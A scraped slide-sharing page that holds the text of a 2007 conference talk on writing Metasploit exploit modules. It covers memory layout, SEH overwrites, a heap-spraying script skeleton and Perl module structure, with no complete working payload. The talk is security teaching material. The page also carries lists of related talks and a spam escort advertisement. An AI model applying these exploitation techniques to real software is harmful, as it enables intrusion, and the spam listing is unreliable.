Phishing As Tragedy of the CommonsPhishing As Tragedy of the Commons
Phishing As Tragedy of the Commons
 
Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art Cisco IOS Attack & Defense - The State of the Art
Cisco IOS Attack & Defense - The State of the Art
 
Secrets of Top Pentesters
Secrets of Top PentestersSecrets of Top Pentesters
Secrets of Top Pentesters
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
 
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
Insecure Implementation of Security Best Practices: of hashing, CAPTCHA's and...
 
Workshop on BackTrack live CD
Workshop on BackTrack live CDWorkshop on BackTrack live CD
Workshop on BackTrack live CD
 
Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writers
 
State of Cyber Law in India
State of Cyber Law in IndiaState of Cyber Law in India
State of Cyber Law in India
 
AntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the uglyAntiSpam - Understanding the good, the bad and the ugly
AntiSpam - Understanding the good, the bad and the ugly
 
Reverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure CodingReverse Engineering v/s Secure Coding
Reverse Engineering v/s Secure Coding
 
Network Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons LearnedNetwork Vulnerability Assessments: Lessons Learned
Network Vulnerability Assessments: Lessons Learned
 
Economic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds DissectedEconomic offenses through Credit Card Frauds Dissected
Economic offenses through Credit Card Frauds Dissected
 
Immune IT: Moving from Security to Immunity
Immune IT: Moving from Security to ImmunityImmune IT: Moving from Security to Immunity
Immune IT: Moving from Security to Immunity
 
Reverse Engineering for exploit writers
Reverse Engineering for exploit writersReverse Engineering for exploit writers
Reverse Engineering for exploit writers
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Web Exploit Finder Presentation
Web Exploit Finder PresentationWeb Exploit Finder Presentation
Web Exploit Finder Presentation
 
Network Security Data Visualization
Network Security Data VisualizationNetwork Security Data Visualization
Network Security Data Visualization
 
Enhancing Computer Security via End-to-End Communication Visualization
Enhancing Computer Security via End-to-End Communication Visualization Enhancing Computer Security via End-to-End Communication Visualization
Enhancing Computer Security via End-to-End Communication Visualization
 
Top Network Vulnerabilities Over Time
Top Network Vulnerabilities Over TimeTop Network Vulnerabilities Over Time
Top Network Vulnerabilities Over Time
 
What are the Business Security Metrics?
What are the Business Security Metrics? What are the Business Security Metrics?
What are the Business Security Metrics?
 

Último

Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 

Último (20)

Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 

Writing Metasploit Plugins

  • 1. More on Metasploit plugins from vulnerability to exploit Saumil Shah ceo, net-square IT Underground - Prague 2007
  • 2.
  • 3. From Vulnerability to Exploit Fuzzing EIP = 0x41414141 Debugger Attack Vector Reliable EIP return address Bad characters Test Shellcode (INT 3) INT 3? Final Shellcode Working exploit Shellcode Handling
  • 4.
  • 5. The Process Memory Map environment vars cmd line arguments **envp **argv argc main() local vars … v heap ^ stack … heap - malloc’ed data .bss .data .text 0xc0000000 0x08000000
  • 6. Win32 Process Memory Map No access Shared user page PEB First TEB DLLs DLLs DLLs heap program image error trapping 0x7FFFFFFF 0x00000000 0x00010000 stack 0x7FFE1000 0x7FFE0000 0x7FFDF000 0x7FFDE000 0x40000000
  • 7.
  • 8.
  • 9.
  • 10. Exception handling … implementation params saved EIP saved EBP Bottom of stack more frames frame w/ exception handling local vars addr of exception handler exception handler code (catch block)
  • 11.
  • 12.
  • 13. SEH on the stack address of exception handler 0xFFFFFFFF main() ^ stack func_z() initial entry frame MSVCRT!exhandler address of exception handler ptr to next SEH record ex_handler_z() params saved EBP saved EIP local vars
  • 14.
  • 15. Overwriting SEH address of exception handler ptr to next SEH record ex_handler() params saved EBP saved EIP buffer
  • 16. Overwriting SEH AAAA AAAA AAAA : : : AAAA AAAA ex_handler() AAAA AAAA AAAA AAAA AAAA Illegal memory access causes segmentation fault. OS invokes registered exception handler in the chain EIP = 0x42424242 AAAA
  • 17.
  • 18.
  • 19.
  • 20.
  • 21.
  • 22.
  • 23.
  • 24.
  • 25. Heap Spraying NOP sled shellcode NOP sled shellcode NOP sled shellcode <script> : spray = build_large_nopsled(); a = new Array(); for(i = 0; i < 100; i++) a[i] = spray + shellcode; : </script> <html> : exploit trigger condition goes here : </html> a[7] a[8] a[9]
  • 26.
  • 27.
  • 28.
  • 29.
  • 30.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38.
  • 39.
  • 40.
  • 41.
  • 42.
  • 43. How Metasploit runs an exploit List of known target values user supplied exploit info Metasploit Shellcode Library Encoders Payload handlers create payload launch attack get connection EXPLOIT preamble
  • 44.
  • 45. Structure of the exploit perl module package Msf::Exploit::name; use base “Msf::Exploit”; use strict; use Pex::Text; my $advanced = { }; my $info = { }; sub new { } sub Exploit { } information block constructor return an instance of our exploit exploit block
  • 46.
  • 47.
  • 48.
  • 49.
  • 50.
  • 51.
  • 52.
  • 53.
  • 54.
  • 55.
  • 56.
  • 57.
  • 58. Thank You! Saumil Shah [email_address] http://net-square.com +91 98254 31192